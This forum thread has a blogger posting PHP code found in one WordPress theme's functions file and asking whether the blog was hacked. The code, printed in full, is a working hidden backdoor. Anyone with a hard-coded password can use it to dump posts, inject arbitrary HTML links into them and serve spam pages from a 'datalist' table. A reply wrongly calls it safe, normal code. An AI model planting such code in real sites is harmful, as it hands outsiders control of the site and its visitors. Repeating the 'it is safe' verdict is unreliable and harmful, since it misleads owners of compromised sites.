
[Question] What is this code, guys? It's in the theme's functions file; has my blog been injected?

Discussion in 'Blog/CMS Stuff' started by thekrim, Mar 29, 2017.

  1. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    I just want to ask, guys: this script is in the theme's functions file.
    Of several blogs that use the same theme, only this one has this script in its theme functions.
    Code:
    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '06865f4b120bf8e77400b05475880f21'))
        {
            switch ($_REQUEST['action'])
                {
                    case 'get_all_links';
                        foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                            {
                                $data['code'] = '';
                               
                                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                    {
                                        $data['code'] = $_[1];
                                    }
                               
                                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                            }
                    break;
                   
                    case 'set_id_links';
                        if (isset($_REQUEST['data']))
                            {
                                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.esc_sql($_REQUEST['id']).'"');
                               
                                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
    
                                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . esc_sql($post_content) . '" WHERE `ID` = "' . esc_sql($_REQUEST['id']) . '"') !== false)
                                    {
                                        print "true";
                                    }
                            }
                    break;
                   
                    case 'create_page';
                        if (isset($_REQUEST['remove_page']))
                            {
                                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.esc_sql($_REQUEST['url']).'"'))
                                    {
                                        print "true";
                                    }
                            }
                        elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                            {
                                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.esc_sql($_REQUEST['url']).'", `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql($_REQUEST['content']).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql(urldecode($_REQUEST['content'])).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'"'))
                                    {
                                        print "true";
                                    }
                            }
                    break;
                   
                    default: print "ERROR_WP_ACTION WP_URL_CD";
                }
               
            die("");
        }
    
       
    if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql( $_SERVER['REQUEST_URI'] ).'"') == '1' )
        {
            $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql($_SERVER['REQUEST_URI']).'"');
            if ($data -> full_content)
                {
                    print stripslashes($data -> content);
                }
            else
                {
                    print '<!DOCTYPE html>';
                    print '<html ';
                    language_attributes();
                    print ' class="no-js">';
                    print '<head>';
                    print '<title>'.stripslashes($data -> title).'</title>';
                    print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                    print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                    print '<meta name="robots" content="index, follow" />';
                    print '<meta charset="';
                    bloginfo( 'charset' );
                    print '" />';
                    print '<meta name="viewport" content="width=device-width">';
                    print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                    print '<link rel="pingback" href="';
                    bloginfo( 'pingback_url' );
                    print '">';
                    wp_head();
                    print '</head>';
                    print '<body>';
                    print '<div id="content" class="site-content">';
                    print stripslashes($data -> content);
                    get_search_form();
                    get_sidebar();
                    get_footer();
                }
               
            exit;
        }
    
    
    ?>
    I'm not sure whether I put this script in myself or how it got there, I've forgotten.
    Or has my blog been injected?
     
  2. hatoRI

    hatoRI Ads.id Pro

    Joined:
    Nov 15, 2015
    Messages:
    415
    Likes Received:
    18
    it's safe, nothing to worry about, that's normal code
     
  3. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    What script is that, guys? I'm really clueless when it comes to HTML like that.
    Because there are 4 blogs using the same theme, but only this blog has that extra code in its theme functions.
    This is an old blog that hasn't been maintained, so I've forgotten.
    If it's safe, maybe I put that script in myself back then, but what for? :hmm2:
     
  4. hatoRI

    hatoRI Ads.id Pro

    Joined:
    Nov 15, 2015
    Messages:
    415
    Likes Received:
    18
    that's for injecting meta details into the index page from the database, bro
     
  5. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    oh, I see
    well, if it's safe then fine, but I'll delete that code anyway because it bothers me
    thanks for the info, bro
     
  6. Gianbizz

    Gianbizz Hero

    Joined:
    Jun 26, 2012
    Messages:
    644
    Likes Received:
    79
    After deleting it, check and double-check the blog, in case it has an effect.
    It could be that it came with a plugin you installed;
    the worry is that the plugin might stop working.
     
  7. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    yes, going forward I'll monitor whether it has any effect or not
    these 4 blogs have the same plugins and the same theme, nothing fancy in the plugins
     
